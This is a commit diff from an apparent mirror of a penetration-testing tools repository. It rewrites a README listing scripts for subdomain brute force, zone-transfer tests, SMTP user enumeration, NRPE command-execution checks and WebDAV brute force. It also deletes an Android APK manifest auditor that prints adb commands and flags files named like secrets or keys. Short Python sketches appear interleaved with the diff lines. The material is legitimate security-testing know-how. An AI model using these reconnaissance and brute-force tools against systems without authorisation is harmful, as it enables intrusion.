Projects STRLCPY pentest-tools Commits 1932a194
    README.md
    1  -# pentest-tools
    2  -My collection of custom tools I use daily.
     1 +<h1 align="center">pentest-tools</h1>
    3 2   
    4  -I don't believe in licenses.
    5  -You can do whatever you want with this program.
     3 +<h4 align="center">A collection of custom security tools for quick needs.</h4>
    6 4   
    7  -However, there is a way to support :)
    8  -<a href="https://github.com/sponsors/gwen001" title="Sponsor gwen001"><img src="https://raw.githubusercontent.com/gwen001/pentest-tools/master/github-sponsor.jpg" alt="Sponsor gwen001" title="Sponsor gwen001"></a>
    9  - 
    10  - 
    11  -### arpa.sh
    12  -A script that will convert address in "arpa" format to classical format.
     5 +<p align="center">
     6 + <img src="https://img.shields.io/badge/-bash-gray" alt="bash badge">
     7 + <img src="https://img.shields.io/badge/python-v3-blue" alt="python badge">
     8 + <img src="https://img.shields.io/badge/php-%3E=5.5-blue" alt="php badge">
     9 + <img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge">
     10 + <a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fpentest-tools%2f" target="_blank"><img src="https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fpentest-tools" alt="twitter badge"></a>
     11 +</p>
    13 12   
     13 +<!-- <p align="center">
     14 + <img src="https://img.shields.io/github/stars/gwen001/pentest-tools?style=social" alt="github stars badge">
     15 + <img src="https://img.shields.io/github/watchers/gwen001/pentest-tools?style=social" alt="github watchers badge">
     16 + <img src="https://img.shields.io/github/forks/gwen001/pentest-tools?style=social" alt="github forks badge">
     17 +</p> -->
    14 18   
    15  -### crtsh.php
    16  -A script that grab subdomains of a given domain from https://crt.sh
     19 +---
    17 20   
     21 +## arpa.sh
     22 +Converts an IP address in `arpa` format to classical dotted-quad format.
     23 +```
     24 +182.218.193.78.in-addr.arpa domain name pointer fey75-1-78-193-218-182.fbxo.proxad.net. -> 78.193.218.182
     25 +```
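The conversion is just a reversal of the first four labels of the `arpa` name. A minimal Python sketch of the same idea (the `arpa_to_ip` helper is illustrative, not part of the script):

```python
def arpa_to_ip(record: str) -> str:
    """Convert a reverse-DNS (in-addr.arpa) name to a dotted-quad IP.

    The first four labels of the arpa name are the IP octets in
    reverse order, so we take them and flip them back.
    """
    host = record.split()[0]      # keep only the arpa name, drop PTR output
    octets = host.split('.')[:4]  # e.g. ['182', '218', '193', '78']
    return '.'.join(reversed(octets))

print(arpa_to_ip('182.218.193.78.in-addr.arpa domain name pointer fey75-1-78-193-218-182.fbxo.proxad.net.'))
```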
     26 +## bbhost.sh
     27 +Runs the `host` command on a given list of hosts, using `parallel` for speed.
    18 28   
    19  -### detect-vnc-rdp.sh
    20  -A script that test port of a given IP range with netcat, by default: 3389 and 5900.
     29 +## codeshare.php
     30 +Performs a string search on [codeshare.io](https://codeshare.io/).
    21 31   
     32 +## cors.py
     33 +Tests for CORS misconfigurations on a given list of hosts.
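The core check such a tool makes can be sketched as pure header logic in Python (`is_cors_misconfigured` is an illustrative name, not the script's actual API):

```python
def is_cors_misconfigured(origin: str, headers: dict) -> bool:
    """Flag the classic exploitable CORS setup: the attacker-supplied
    Origin is reflected back AND credentials are allowed."""
    acao = headers.get('Access-Control-Allow-Origin', '')
    creds = headers.get('Access-Control-Allow-Credentials', '').lower() == 'true'
    return acao == origin and creds

# A reflected origin plus credentials support is the dangerous case:
print(is_cors_misconfigured(
    'https://evil.example',
    {'Access-Control-Allow-Origin': 'https://evil.example',
     'Access-Control-Allow-Credentials': 'true'}))
```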
    22 34   
    23  -### dnsenum-brute.sh
    24  -A script that perform brute force through wordlist to find subdomains.
     35 +## crlf.py
     36 +Tests for CRLF injection on a given list of hosts.
    25 37   
     38 +## crtsh.php
     39 +Grabs subdomains of a given domain from https://crt.sh
    26 40   
    27  -### dnsenum-bruten.sh
    28  -A script that perform brute force through numeric variation to find subdomains.
     41 +## detect-vnc-rdp.sh
     42 +Tests if ports `3389` and `5900` are open on a given IP range using `netcat`.
    29 43   
     44 +## dnsenum-brute.sh
     45 +Performs brute force through a wordlist to find subdomains.
    30 46   
    31  -### dnsenum-reverse.sh
    32  -A script that apply reverse DNS technic on a given IP range to find subdomains.
     47 +## dnsenum-bruten.sh
     48 +Performs brute force through numeric variations to find subdomains.
    33 49   
     50 +## dnsenum-reverse.sh
     51 +Applies the reverse DNS method on a given IP range to find subdomains.
    34 52   
    35  -### dnsenum-reverserange.sh
     53 +## dnsenum-reverserange.sh
    36 54  Same as above, but IP ranges are read from an input file.
    37 55   
     56 +## dnsenum-zonetransfer.sh
     57 +Tests Zone Transfer of a given domain.
    38 58   
    39  -### dnsenum-zonetransfer.sh
    40  -A script that test Zone Transfer of a given domain.
     59 +## dnsreq-alltypes.sh
     60 +Performs all types of DNS requests for a given (sub)domain.
    41 61   
     62 +## extract-domains.py
     63 +Extracts the domain from a given URL or list of URLs.
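A rough standard-library equivalent of the extraction step (`extract_domain` is an illustrative helper, not the script's API):

```python
from urllib.parse import urlparse

def extract_domain(url: str) -> str:
    """Return the hostname part of a URL (scheme, port, path stripped)."""
    return urlparse(url).hostname or ''

print(extract_domain('https://sub.example.com:8443/path?q=1'))  # sub.example.com
```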
    42 64   
    43  -### extract-endpoints.php
    44  -A script that try to extract endpoints from Javascript files, thanks to [ZSeano](https://twitter.com/zseano)
     65 +## extract_links.php
     66 +Extracts links from a given HTML file.
    45 67   
     68 +## filterurls.py
     69 +Classifies and displays URLs by vulnerability types.
    46 70   
    47  -### extract_links.php
    48  -A script that try to extract links from a given HTML file.
     71 +## flash-regexp.sh
     72 +Runs the regexps listed in `flash-regexp.txt`, for Flash application testing.
    49 73   
     74 +## gdorks.php
     75 +Generates Google dorks for a given domain (searches are not performed).
    50 76   
    51  -### finddl.sh
    52  -???
     77 +## hashall.php
     78 +Uses about 40 algorithms to hash a given string.
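A comparable approach in Python using `hashlib` (a sketch of the idea, not the PHP script's actual algorithm list or output format):

```python
import hashlib

def hash_all(s: str) -> dict:
    """Hash a string with every algorithm guaranteed by hashlib."""
    data = s.encode()
    return {name: hashlib.new(name, data).hexdigest()
            for name in sorted(hashlib.algorithms_guaranteed)
            if not name.startswith('shake_')}  # shake_* needs a length argument

for name, digest in hash_all('admin').items():
    print(f'{name}: {digest}')
```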
    53 79   
     80 +## ip-converter.php
     81 +Converts a given IP address to different formats; see [Nicolas Grégoire presentation](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf).
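The classic alternate notations (useful against naive URL filters, as in the linked presentation) can be produced with a short Python sketch (assuming IPv4; `ip_formats` is a hypothetical helper):

```python
import ipaddress

def ip_formats(ip: str) -> dict:
    """Alternate notations of an IPv4 address that many URL parsers accept."""
    n = int(ipaddress.IPv4Address(ip))
    return {
        'decimal': str(n),    # e.g. http://2130706433/
        'hex': hex(n),        # e.g. http://0x7f000001/
        'octal': '0%o' % n,   # e.g. http://017700000001/
    }

print(ip_formats('127.0.0.1'))
```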
    54 82   
    55  -### gdorks.php
    56  -A script that simply creates Google dorks for a given domain (the search are not performed).
    57 83   
    58 84   
    59  -### gg-extract-links.php
    60  -???
    61 85   
    62 86   
    63  -### ip-converter.php
    64  -A script that convert a given IP address to different format, thanks to [Nicolas Grégoire](http://www.agarri.fr/)
    65 87   
    66 88   
    67  -### ip-listing.php
     89 +## ip-listing.php
    68 90  A script that generates every IP address from a given start address to a given end address.
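The same enumeration is easy to sketch in Python with the `ipaddress` module (illustrative, not the script itself):

```python
import ipaddress

def ip_range(start: str, end: str):
    """Yield every IPv4 address from start to end, inclusive."""
    a = int(ipaddress.IPv4Address(start))
    b = int(ipaddress.IPv4Address(end))
    for n in range(a, b + 1):
        yield str(ipaddress.IPv4Address(n))

print(list(ip_range('10.0.0.254', '10.0.1.1')))
```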
    69 91   
    70 92   
    71  -### mass_axfr.sh
     93 +## mass_axfr.sh
    72 94  A script that tests Zone Transfer on a given list of domains using [Fierce](https://github.com/mschwager/fierce).
    73 95   
    74 96   
    75  -### mass-smtp-user-enum-bruteforce.sh
     97 +## mass-smtp-user-enum-bruteforce.sh
    76 98  A script that performs SMTP user enumeration on a given list of IP addresses using [smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum)
    77 99   
    78 100   
    79  -### mass-smtp-user-enum-check.sh
     101 +## mass-smtp-user-enum-check.sh
    80 102  A script that simply tests if SMTP user enumeration is possible on a given list of IP addresses using [smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum)
    81 103   
    82 104   
    83  -### nrpe.sh
     105 +## nrpe.sh
    84 106  A script that tests the Nagios Remote Plugin Executor Arbitrary Command Execution vulnerability using Metasploit.
    85 107   
    86 108   
    87  -### pass-permut.php
     109 +## pass-permut.php
    88 110  A script that creates word permutations with different separators and outputs the hashes.
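A minimal Python sketch of the idea, assuming MD5 output and a small separator set (`permut_hashes` is a hypothetical helper, not the PHP script's API):

```python
import hashlib
from itertools import permutations

def permut_hashes(words, separators=('', '.', '-', '_')):
    """Join every permutation of words with every separator and
    return {candidate: md5} pairs, as a password-guessing helper."""
    out = {}
    for sep in separators:
        for perm in permutations(words):
            candidate = sep.join(perm)
            out[candidate] = hashlib.md5(candidate.encode()).hexdigest()
    return out

for pwd, h in permut_hashes(['john', '1984']).items():
    print(pwd, h)
```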
    89 111   
    90 112   
    91  -### ping-sweep-nc.sh
     113 +## ping-sweep-nc.sh
    92 114  A script that tries to determine which IPs are alive in a given IP address range using Netcat.
    93 115   
    94 116   
    95  -### ping-sweep-nmap.sh
     117 +## ping-sweep-nmap.sh
    96 118  A script that tries to determine which IPs are alive in a given IP address range using Nmap.
    97 119   
    98 120   
    99  -### ping-sweep-ping.sh
     121 +## ping-sweep-ping.sh
    100 122  A script that tries to determine which IPs are alive in a given IP address range using Ping.
    101 123   
    102 124   
    103  -### portscan-nc.sh
     125 +## portscan-nc.sh
    104 126  A script that tries to determine the open ports of a given IP address using Netcat.
    105 127   
    106 128   
    107  -### screensite.sh
     129 +## screensite.sh
    108 130  A script that takes a screenshot of a given URL+port using Xvfb.
    109 131   
    110 132   
    111  -### srv_reco.sh
     133 +## srv_reco.sh
    112 134  A script that performs a very small test of a given IP address.
    113 135   
    114 136   
    115  -### ssh-timing-b4-pass.sh
     137 +## ssh-timing-b4-pass.sh
    116 138  ???
    117 139   
    118 140   
    119  -### ssrf-generate-ip.php
     141 +## ssrf-generate-ip.php
    120 142  A script that generates random IP addresses inside private network ranges.
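A Python sketch of the same idea, assuming the RFC 1918 ranges (`random_private_ip` is an illustrative helper):

```python
import ipaddress
import random

# RFC 1918 private ranges, the usual SSRF targets
PRIVATE_NETS = ['10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16']

def random_private_ip() -> str:
    """Pick a random address inside one of the private ranges."""
    net = ipaddress.IPv4Network(random.choice(PRIVATE_NETS))
    offset = random.randrange(net.num_addresses)
    return str(net[offset])

print(random_private_ip())
```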
    121 143   
    122 144   
    123  -### subdomains_finder.sh
     145 +## subdomains_finder.sh
    124 146  A script that finds subdomains using other well-known programs ([TheHarvester](https://github.com/laramies/theHarvester), [DNSrecon](https://github.com/darkoperator/dnsrecon)...)
    125 147   
    126 148   
    127  -### subthreat.php
     149 +## subthreat.php
    128 150  A script that grabs subdomains of a given domain from https://www.threatcrowd.org
    129 151   
    130 152   
    131  -### testhttp.php
     153 +## testhttp.php
    132 154  A script that tests whether a URL (subdomain+port) serves web content.
    133 155   
    134 156   
    135  -### testhttp2.php
     157 +## testhttp2.php
    136 158  Same same but different.
    137 159   
    138 160   
    139  -### test-ip-wordlist.sh
     161 +## test-ip-wordlist.sh
    140 162  ???
    141 163   
    142 164   
    143  -### testnc.sh
     165 +## testnc.sh
    144 166  A script that fuzzes a given IP address with Netcat.
    145 167   
    146 168   
    147  -### wayback-analyzer.php
     169 +## wayback-analyzer.php
    148 170  A script that tries to nicely display [waybackurls.py](https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050) output.
    149 171   
    150 172   
    151  -### webdav-bruteforce.sh
     173 +## webdav-bruteforce.sh
    152 174  A script that performs brute force on a given WebDav URL using [Davtest](https://github.com/cldrn/davtest)
    153 175   
    apk-analyzer.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import argparse
    7  -import os
    8  -import subprocess
    9  -import sys
    10  -import xml.etree.ElementTree as ET
    11  - 
    12  -from colored import attr, bg, fg
    13  - 
    14  -t_templates = [
    15  - '_report.html',
    16  -]
    17  -t_templates_str = {}
    18  - 
    19  -############################### FUNCTIONS ###############################
    20  -def loadTemplates():
    21  - for tpl in t_templates:
    22  - t_templates_str[tpl] = 'aaa'
    23  - print(t_templates_str)
    24  - 
    25  -# loadTemplates()
    26  -# exit()
    27  - 
    28  - 
    29  -def format_bytes( size ):
    30  - units = ['b', 'kb', 'mb', 'gb', 'tb']
    31  - i = 0
    32  - while size>=1024 and i<4:
    33  - size = size / 1024
    34  - i = i + 1
    35  - return str(round(size,2)) + units[i]
    36  - 
    37  -def printH1( title ):
    38  - sys.stdout.write( '\n\n%s### %s ###%s\n\n' % (fg('light_cyan'),title,attr(0)) )
    39  - 
    40  -def printH2( title ):
    41  - sys.stdout.write( '\n%s# %s #%s\n\n' % (fg('light_blue'),title,attr(0)) )
    42  - 
    43  -def _print( txt, extra='', level='normal' ):
    44  - if not len(level):
    45  - level = 'normal'
    46  - t_colors = {
    47  - 'silent': 'grey_35',
    48  - 'hsilent': 'grey_35',
    49  - 'debug': 'light_magenta',
    50  - 'hdebug': 'magenta',
    51  - 'normal': 'white',
    52  - 'hnormal': 'light_gray',
    53  - 'info': 'light_green',
    54  - 'hinfo': 'green',
    55  - 'notice': 'gold_1',
    56  - 'hnotice': 'dark_orange_3a',
    57  - 'warning': 'light_red',
    58  - 'hwarning': 'red',
    59  - }
    60  - if len(txt):
    61  - sys.stdout.write( '%s%s' % (fg(t_colors[level]),txt) )
    62  - if len(extra):
    63  - # sys.stdout.write( ' [%s:%s]' % (level.replace('h',''),extra) )
    64  - sys.stdout.write( ' -- %s' % (extra) )
    65  - sys.stdout.write( '%s\n' % attr(0) )
    66  -############################### FUNCTIONS ###############################
    67  - 
    68  - 
    69  -############################### BASIC INFOS ###############################
    70  -def readInfos( grep_term ):
    71  - printH1( 'INFOS' )
    72  - 
    73  - _print( ('Package: %s' % root.attrib['package']) )
    74  - 
    75  - if 'platformBuildVersionCode' in root.attrib:
    76  - version = root.attrib['platformBuildVersionCode']
    77  - elif 'compileSdkVersion' in root.attrib:
    78  - version = root.attrib['compileSdkVersion']
    79  - else:
    80  - version = '?'
    81  - _print( ('Build: %s' % version) )
    82  - 
    83  - if not grep_term:
    84  - grep_term = root.attrib['package'].split('.')[1]
    85  - _print( ('Grep term: %s' % grep_term) )
    86  - # sys.stdout.write( '\n\n' )
    87  - 
    88  - return grep_term
    89  -############################### BASIC INFOS ###############################
    90  - 
    91  - 
    92  -############################### PERMISSIONS ###############################
    93  -def listPermissionsCreated():
    94  - t_term = []
    95  - t_noterm = []
    96  - t_all = root.findall('permission')
    97  - for obj in t_all:
    98  - if grep_term in obj.attrib['name']:
    99  - t_term.append( obj )
    100  - else:
    101  - t_noterm.append( obj )
    102  - 
    103  - printH2( 'PERMISSIONS CREATED (<permission>) (%d)' % len(t_all) )
    104  - printPermissionsCreated( t_term )
    105  - if len(t_term) and len(t_noterm):
    106  - sys.stdout.write( '---\n' )
    107  - printPermissionsCreated( t_noterm, 'h' )
    108  - 
    109  -def printPermissionsCreated( tab, plevel0='' ):
    110  - t_warning = {'EXTERNAL_STORAGE':'external storage permission','INTERNET':'webview permission'}
    111  - for obj in tab:
    112  - extra = ''
    113  - plevel = 'normal'
    114  - for k,v in t_warning.items():
    115  - if k in obj.attrib['name']:
    116  - extra = v
    117  - plevel = 'warning'
    118  - if not 'protectionLevel' in obj.attrib or obj.attrib['protectionLevel'] != 'signature':
    119  - extra = 'no signature'
    120  - plevel = 'warning'
    121  - _print( obj.attrib['name'], extra, plevel0+plevel )
    122  - 
    123  - 
    124  -def listPermissionsUsed():
    125  - t_term = []
    126  - t_noterm = []
    127  - t_all = root.findall('uses-permission')
    128  - for obj in t_all:
    129  - if grep_term in obj.attrib['name']:
    130  - t_term.append( obj )
    131  - else:
    132  - t_noterm.append( obj )
    133  - 
    134  - printH2( 'PERMISSIONS USED (<uses-permission>) (%d)' % len(t_all) )
    135  - printPermissionsUsed( t_term )
    136  - if len(t_term) and len(t_noterm):
    137  - sys.stdout.write( '---\n' )
    138  - printPermissionsUsed( t_noterm, 'h' )
    139  - 
    140  -def printPermissionsUsed( tab, plevel0='' ):
    141  - t_warning = {'EXTERNAL_STORAGE':'external storage permission','INTERNET':'webview permission'}
    142  - for obj in tab:
    143  - extra = ''
    144  - plevel = 'normal'
    145  - for k,v in t_warning.items():
    146  - if k in obj.attrib['name']:
    147  - extra = v
    148  - plevel = 'warning'
    149  - _print( obj.attrib['name'], extra, plevel0+plevel )
    150  - 
    151  - 
    152  -def listPermissionsRequired():
    153  - t_all = root.findall('permission')
    154  - t_term = []
    155  - t_noterm = []
    156  - for elem in root.iter():
    157  - if 'permission' in elem.attrib:
    158  - if grep_term in elem.attrib['permission']:
    159  - t_term.append( elem )
    160  - else:
    161  - t_noterm.append( elem )
    162  - 
    163  - printH2( 'PERMISSIONS REQUIRED (permission="") (%d)' % (len(t_term)+len(t_noterm)) )
    164  - printPermissionsRequired( t_all, t_term )
    165  - if len(t_term) and len(t_noterm):
    166  - sys.stdout.write( '---\n' )
    167  - printPermissionsRequired( t_all, t_noterm, 'h' )
    168  - 
    169  -def printPermissionsRequired( t_allperm, tab, plevel0='' ):
    170  - t_unwarn = ['android.permission','com.google.android','com.google.firebase']
    171  - for obj in tab:
    172  - extra = 'permission used but not created'
    173  - plevel = 'warning'
    174  - for perm in t_allperm:
    175  - if obj.attrib['permission'] == perm.attrib['name']:
    176  - extra = ''
    177  - plevel = 'normal'
    178  - for w in t_unwarn:
    179  - if w in obj.attrib['permission']:
    180  - extra = ''
    181  - plevel = 'normal'
    182  - _print( obj.attrib['permission'], extra, plevel0+plevel )
    183  - # sys.stdout.write( '%s%s %s%s\n' % (fg(color),obj.attrib['permission'],extra,attr(0)) )
    184  - 
    185  -def listPermissions():
    186  - printH1( 'PERMISSIONS' )
    187  - listPermissionsCreated()
    188  - listPermissionsUsed()
    189  - listPermissionsRequired()
    190  -############################### PERMISSIONS ###############################
    191  - 
    192  - 
    193  -############################### ACTIVITIES ###############################
    194  -def listActivities():
    195  - app = root.find( 'application' )
    196  - t_all = app.findall('activity')
    197  - t_all = t_all + app.findall('activity-alias')
    198  - t_term = []
    199  - t_noterm = []
    200  - for obj in t_all:
    201  - if grep_term in obj.attrib['name']:
    202  - t_term.append( obj )
    203  - else:
    204  - t_noterm.append( obj )
    205  - printH1( 'ACTIVITIES (%d)' % len(t_all) )
    206  - printActivities( t_term )
    207  - if len(t_term) and len(t_noterm):
    208  - sys.stdout.write( '---\n' )
    209  - printActivities( t_noterm, 'h' )
    210  - 
    211  -def printActivities( tab, plevel0='' ):
    212  - for obj in tab:
    213  - if 'exported' in obj.attrib:
    214  - extra = 'exported param'
    215  - exported = obj.attrib['exported'].lower()
    216  - elif obj.findall('intent-filter'):
    217  - extra = 'intent-filter'
    218  - exported = 'true'
    219  - else:
    220  - exported = 'false'
    221  - if 'permission' in obj.attrib and grep_term in obj.attrib['permission']:
    222  - exported = 'false'
    223  - if exported == 'false':
    224  - extra = ''
    225  - plevel = 'normal'
    226  - else:
    227  - extra = "activity is exported ("+extra+") and no '" + grep_term + "' permission setted"
    228  - plevel = 'warning'
    229  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    230  - extra = extra + " but is disabled"
    231  - plevel = 'notice'
    232  - _print( '[+] '+obj.attrib['name'] ,extra, plevel0+plevel )
    233  - for k,v in sorted(obj.attrib.items()):
    234  - k = k.replace('','')
    235  - if not k == 'name':
    236  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    237  - if display_commands:
    238  - # t_actions = ['android.intent.action.VIEW']
    239  - # if obj.findall('intent-filter'):
    240  - # for intentfilter in obj.findall('intent-filter'):
    241  - # if intentfilter.findall('action'):
    242  - # for action in intentfilter.findall('action'):
    243  - # if not action.attrib['name'] in t_actions:
    244  - # t_actions.append( action.attrib['name'] )
    245  - # for action in t_actions:
    246  - # _print( ' adb shell am start -S -a '+action+' -n '+root.attrib['package']+'/'+obj.attrib['name'] ,'', 'silent' )
    247  - _print( ' adb shell am start -S -n '+root.attrib['package']+'/'+obj.attrib['name'], '', 'silent' )
    248  -############################### ACTIVITIES ###############################
    249  - 
    250  - 
    251  -############################### SERVICES ###############################
    252  -def listServices():
    253  - app = root.find( 'application' )
    254  - t_all = app.findall('service')
    255  - t_term = []
    256  - t_noterm = []
    257  - for obj in t_all:
    258  - if grep_term in obj.attrib['name']:
    259  - t_term.append( obj )
    260  - else:
    261  - t_noterm.append( obj )
    262  - printH1( 'SERVICES (%d)' % len(t_all) )
    263  - printServices( t_term )
    264  - if len(t_term) and len(t_noterm):
    265  - sys.stdout.write( '---\n' )
    266  - printServices( t_noterm, 'h' )
    267  - 
    268  - 
    269  -def printServices( tab, plevel0='' ):
    270  - for obj in tab:
    271  - if 'exported' in obj.attrib:
    272  - extra = 'exported param'
    273  - exported = obj.attrib['exported'].lower()
    274  - elif obj.findall('intent-filter'):
    275  - extra = 'intent-filter'
    276  - exported = 'true'
    277  - else:
    278  - exported = 'false'
    279  - if 'permission' in obj.attrib and grep_term in obj.attrib['permission']:
    280  - exported = 'false'
    281  - if exported == 'false':
    282  - extra = ''
    283  - plevel = 'normal'
    284  - else:
    285  - extra = "service is exported ("+extra+") and no '" + grep_term + "' permission setted"
    286  - plevel = 'warning'
    287  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    288  - extra = extra + " but is disabled"
    289  - plevel = 'notice'
    290  - _print( '[+] '+obj.attrib['name'] ,extra, plevel0+plevel )
    291  - for k,v in sorted(obj.attrib.items()):
    292  - k = k.replace('','')
    293  - if not k == 'name':
    294  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    295  - if display_commands:
    296  - _print( ' adb shell am startservice -n '+root.attrib['package']+'/'+obj.attrib['name'],'', 'silent' )
    297  -############################### SERVICES ###############################
    298  - 
    299  - 
    300  -############################### RECEIVERS ###############################
    301  -def listReceivers():
    302  - app = root.find( 'application' )
    303  - t_all = app.findall('receiver')
    304  - t_term = []
    305  - t_noterm = []
    306  - for obj in t_all:
    307  - if grep_term in obj.attrib['name']:
    308  - t_term.append( obj )
    309  - else:
    310  - t_noterm.append( obj )
    311  - printH1( 'RECEIVERS (%d)' % len(t_all) )
    312  - printReceivers( t_term )
    313  - if len(t_term) and len(t_noterm):
    314  - sys.stdout.write( '---\n' )
    315  - printReceivers( t_noterm, 'h' )
    316  - 
    317  - 
    318  -def printReceivers( tab, plevel0='' ):
    319  - for obj in tab:
    320  - if 'exported' in obj.attrib:
    321  - extra = 'exported param'
    322  - exported = obj.attrib['exported'].lower()
    323  - elif obj.findall('intent-filter'):
    324  - extra = 'intent-filter'
    325  - exported = 'true'
    326  - else:
    327  - exported = 'false'
    328  - if 'permission' in obj.attrib and grep_term in obj.attrib['permission']:
    329  - exported = 'false'
    330  - if exported == 'false':
    331  - extra = ''
    332  - plevel = 'normal'
    333  - else:
    334  - extra = "receiver is exported ("+extra+") and no '" + grep_term + "' permission setted"
    335  - plevel = 'warning'
    336  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    337  - extra = extra + " but is disabled"
    338  - plevel = 'notice'
    339  - _print( '[+] '+obj.attrib['name'] ,extra, plevel0+plevel )
    340  - for k,v in sorted(obj.attrib.items()):
    341  - k = k.replace('','')
    342  - if not k == 'name':
    343  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    344  - if display_commands:
    345  - # t_actions = ['android.intent.action.VIEW']
    346  - # if obj.findall('intent-filter'):
    347  - # for intentfilter in obj.findall('intent-filter'):
    348  - # if intentfilter.findall('action'):
    349  - # for action in intentfilter.findall('action'):
    350  - # if not action.attrib['name'] in t_actions:
    351  - # t_actions.append( action.attrib['name'] )
    352  - # for action in t_actions:
    353  - # _print( ' adb shell am start -S -a '+action+' -n '+root.attrib['package']+'/'+obj.attrib['name'] ,'', 'silent' )
    354  - _print( ' adb shell am broadcast -n '+root.attrib['package']+'/'+obj.attrib['name'], '', 'silent' )
    355  -############################### RECEIVERS ###############################
    356  - 
    357  - 
    358  -############################### PROVIDERS ###############################
    359  -def listProviders():
    360  - app = root.find( 'application' )
    361  - t_all = app.findall('provider')
    362  - t_term = []
    363  - t_noterm = []
    364  - t_providers_uri = {}
    365  - for obj in t_all:
    366  - if obj.attrib['authorities'].startswith('@'):
    367  - continue
    368  - if grep_term in obj.attrib['authorities']:
    369  - t_term.append( obj )
    370  - else:
    371  - t_noterm.append( obj )
    372  - t_providers_uri[ obj.attrib['authorities'] ] = getProviderURI( obj.attrib['authorities'] )
    373  - printH1( 'PROVIDERS (%d)' % len(t_all) )
    374  - printProviders( t_term, t_providers_uri )
    375  - if len(t_term) and len(t_noterm):
    376  - sys.stdout.write( '---\n' )
    377  - printProviders( t_noterm, t_providers_uri, 'h' )
    378  - 
    379  -def getProviderURI( authority ):
    380  - t_uri = [ 'content://'+authority ]
    381  - # t_uri = [ 'content://'+authority ]
    382  - cmd = 'egrep -hro "content://'+ authority + '[a-zA-Z0-9_-/\.]+" "' + src_directory + '/smali/" 2>/dev/null'
    383  - # print(cmd)
    384  - try:
    385  - output = subprocess.check_output( cmd, shell=True ).decode('utf-8')
    386  - # print(output)
    387  - except Exception as e:
    388  - # sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    389  - return t_uri
    390  - 
    391  - for l in output.split("\n"):
    392  - if not len(l):
    393  - continue
    394  - tiktok = ''
    395  - l = l.strip().strip('/').replace( 'content://','' )
    396  - t_split = l.split('/')
    397  - for token in t_split:
    398  - tiktok = tiktok + '/' + token
    399  - tiktok = tiktok.strip('/')
    400  - uri1 = 'content://' + tiktok
    401  - if not uri1 in t_uri:
    402  - t_uri.append( uri1 )
    403  - # uri2 = 'content://' + tiktok + '/'
    404  - # if not uri2 in t_uri:
    405  - # t_uri.append( uri2 )
    406  - 
    407  - return t_uri
    408  - 
    409  - 
    410  -def printProviders( tab, t_providers_uri, plevel0='' ):
    411  - for obj in tab:
    412  - if 'exported' in obj.attrib:
    413  - extra = 'exported param'
    414  - exported = obj.attrib['exported'].lower()
    415  - elif obj.findall('intent-filter'):
    416  - extra = 'intent-filter'
    417  - exported = 'true'
    418  - else:
    419  - exported = 'false'
    420  - if ('permission' in obj.attrib and grep_term in obj.attrib['permission']) or ('readPermission' in obj.attrib and grep_term in obj.attrib['readPermission']):
    421  - exported = 'false'
    422  - if exported == 'false':
    423  - extra = ''
    424  - plevel = 'normal'
    425  - else:
    426  - extra = "provider is exported ("+extra+") and no '" + grep_term + "' permission setted"
    427  - plevel = 'warning'
    428  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    429  - extra = extra + " but is disabled"
    430  - plevel = 'notice'
    431  - _print( '[+] '+obj.attrib['authorities'] ,extra, plevel0+plevel )
    432  - for k,v in sorted(obj.attrib.items()):
    433  - k = k.replace('','')
    434  - if not k == 'name':
    435  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    436  - if obj.attrib['authorities'] in t_providers_uri and len(t_providers_uri[obj.attrib['authorities']]):
    437  - if len(obj.attrib)>1:
    438  - _print( ' ---', '', plevel0+plevel )
    439  - for uri in sorted(t_providers_uri[obj.attrib['authorities']]):
    440  - _print( ' %s' % uri, '', plevel0+plevel )
    441  - if display_commands:
    442  - _print( ' adb shell content query --uri '+uri, '', 'silent' )
    443  -############################### PROVIDERS ###############################
    444  - 
    445  - 
    446  -############################### INTERESTING FILES ###############################
    447  -t_files_warning = ['conf','secret','pass','key','auth','cer','crt']
    448  -t_files_ignore = ['.shader','.dict','abp.txt','crashlytics-build.properties','tzdb.dat','.snsr','.alyp','.alyg','.frag','.vert','.gmt','.kml','.traineddata','.glsl','.glb','.css','.otf','.aac','.mid','.ogg','.m4a','.m4v','.ico','.gif','.jpg','.jpeg','.png','.bmp','.svg','.avi','.mpg','.mpeg','.mp3','.woff','.woff2','.ttf','.eot','.mp3','.mp4','.wav','.mpg','.mpeg','.avi','.mov','.wmv' ]
    449  - 
    450  -def _listFiles( dir ):
    451  - t_all = []
    452  - t_files = []
    453  - 
    454  - # r=root, d=directories, f=files
    455  - for r, d, f in os.walk( dir ):
    456  - for file in f:
    457  - filepath = os.path.join(r,file)
    458  - # filename = filepath.replace(src_directory+'/','')
    459  - filename = filepath.replace(' ','\ ')
    460  - filesstats = os.stat( filepath )
    461  - filesize = format_bytes( filesstats.st_size )
    462  - t_all.append( {'filename':filename,'filesize':filesize} )
    463  - if not filesstats.st_size:
    464  - ignore = True
    465  - else:
    466  - ignore = False
    467  - for i in t_files_ignore:
    468  - if i in filename.lower():
    469  - ignore = True
    470  - if not ignore:
    471  - t_files.append( {'filename':filename,'filesize':filesize} )
    472  - 
    473  - return t_all,t_files
    474  - 
    475  - 
    476  -def printFiles( t_files ):
    477  - for file in sorted(t_files,key=lambda k:k['filename']):
    478  - extra = ''
    479  - plevel = 'normal'
    480  - for w in t_files_warning:
    481  - if w in file['filename'].lower():
    482  - extra = 'can be a sensitive file (\'' + w + '\' found in filemane)'
    483  - plevel = 'warning'
    484  - # sys.stdout.write( '%s%s (%s) %s%s\n' % (fg(color),file['filename'],file['filesize'],extra,attr(0)) )
